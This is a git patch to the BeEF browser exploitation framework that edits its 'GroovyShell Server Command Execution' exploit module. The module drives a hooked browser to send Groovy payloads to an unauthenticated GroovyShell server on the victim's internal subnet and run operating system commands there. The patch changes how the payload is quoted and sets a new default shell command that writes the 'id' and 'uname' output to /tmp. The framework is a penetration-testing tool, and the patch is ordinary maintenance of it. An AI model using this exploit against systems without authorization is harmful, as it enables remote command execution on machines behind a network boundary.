From 2dae1d4c0746823c1463f80f554289c831ee5c06 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 22 May 2013 14:37:01 +0930
Subject: [PATCH] Add `/bin/sh -c` to default command

---
 modules/exploits/groovyshell_server_cmd_exec/command.js  | 2 +-
 modules/exploits/groovyshell_server_cmd_exec/config.yaml | 2 +-
 modules/exploits/groovyshell_server_cmd_exec/module.rb   | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/groovyshell_server_cmd_exec/command.js b/modules/exploits/groovyshell_server_cmd_exec/command.js
index 9eeaf268f..3b8d43fd8 100644
--- a/modules/exploits/groovyshell_server_cmd_exec/command.js
+++ b/modules/exploits/groovyshell_server_cmd_exec/command.js
@@ -13,7 +13,7 @@ beef.execute(function() {
 	// validate payload
 	try {
 		var cmd     = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
-		var payload = '\r\ndiscard\r\nprintln "'+cmd+'".execute().text\r\ngo\r\nexit\r\n'
+		var payload = '\r\ndiscard\r\nprintln \''+cmd+'\'.execute().text\r\ngo\r\nexit\r\n'
 	} catch(e) {
 		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
 		return;
diff --git a/modules/exploits/groovyshell_server_cmd_exec/config.yaml b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
index 9ce57c7af..8bb4a20b5 100644
--- a/modules/exploits/groovyshell_server_cmd_exec/config.yaml
+++ b/modules/exploits/groovyshell_server_cmd_exec/config.yaml
@@ -9,7 +9,7 @@ beef:
             enable: true
             category: "Exploits"
             name: "GroovyShell Server Command Execution"
-            description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF."
+            description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
             authors: ["bcoles"]
             target:
                 working: ["FF", "C"]
diff --git a/modules/exploits/groovyshell_server_cmd_exec/module.rb b/modules/exploits/groovyshell_server_cmd_exec/module.rb
index e1dc60f1d..8f0526eb8 100644
--- a/modules/exploits/groovyshell_server_cmd_exec/module.rb
+++ b/modules/exploits/groovyshell_server_cmd_exec/module.rb
@@ -10,7 +10,7 @@ class Groovyshell_server_command_execution < BeEF::Core::Command
 	{'name'=>'rhost',   'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
 	{'name'=>'rport',   'ui_label' => 'Remote Port', 'value' => '6789'},
 	{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
-	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'id', 'width'=>'200px' },
+	{'name'=>'cmd',     'ui_label' => 'Commands',    'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width'=>'200px' },
     ]
   end